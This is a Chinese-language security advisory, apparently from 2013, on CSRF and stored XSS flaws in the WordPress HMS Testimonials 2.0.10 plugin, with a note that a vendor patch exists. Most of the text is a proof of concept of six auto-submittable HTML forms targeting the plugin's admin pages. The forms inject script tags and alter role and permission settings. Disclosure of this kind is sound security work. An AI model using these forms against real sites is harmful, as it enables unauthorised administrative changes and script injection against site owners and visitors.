WordPress HMS Testimonials 2.0.10 XSS / CSRF漏洞

发布日期：2013-08-09
更新日期：2013-08-10

受影响系统：
WordPress HMS Testimonials 2.0.10
描述：
--------------------------------------------------------------------------------
WordPress HMS Testimonials插件可在网页或帖子上显示客户的评价。

WordPress HMS Testimonials的所有表单都受到CSRF漏洞的影响，可导致远程攻击者执行未授权数据库操作。

<*来源：Jeff Kreitner
 
  链接：
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Proof of Concept
========================
1. Testimonial
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnew">
    <input type="hidden" value="<script>alert('xss')</script>">
    <input type="hidden" value="<script>alert('xss')</script>">
    <input type="hidden" value="08/08/2013">
    <input type="hidden" value="<script>alert(String.fromCharCode(88,83,83))</script>">
    <input type="hidden" value="<script>alert('xss')</script>">
    <input type="hidden" value="1">
    <input type="submit" value="Save Testimonial">
</form>

2. Group
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnewgroup&noheader=true">
    <input type="hidden" value="New group">
    <input type="submit" value="Save Group">
</form>

3.1. Settings - Default
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings">
    <input type="hidden" value="1">
    <input type="hidden" value='100'>
    <input type="hidden" value='100'>
    <input type="hidden" value='m/d/Y"><script>alert(3)</script>'>
    <input type="hidden" value='div'>
    <input type="hidden" value="">
    <input type="hidden" value="">
    <input type="submit" value="Save Settings (Default)">
</form>

3.2. Settings - Advanced
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-advanced">
    <input type="hidden" value="subscriber">
    <input type="hidden" value="subscriber">
    <input type="hidden" value="9999">
    <input type="hidden" value="subscriber">
    <input type="hidden" value="1">
    <input type="hidden" value="1">
    <input type="hidden" value="editor">
    <input type="hidden" value="author">
    <input type="hidden" value="contributor">
    <input type="hidden" value="subscriber">
    <input type="submit" value="Save Settings (Advanced)">
</form>

3.3. Settings - Custom Fields
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-fields">
    <input type="hidden" value="xss">
    <input type="hidden" value="textarea">
    <input type="hidden" value="1">
    <input type="submit" value="Save Settings (Custom Fields)">
</form>

3.4. Settings - Template
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-templates-new">
    <input type="hidden" value="New template<script>alert('xss')</script>">
    <input type="hidden" value="system_id">
    <input type="submit" value="Settings Templates (Save)">
</form>

建议：
--------------------------------------------------------------------------------
厂商补丁：

WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：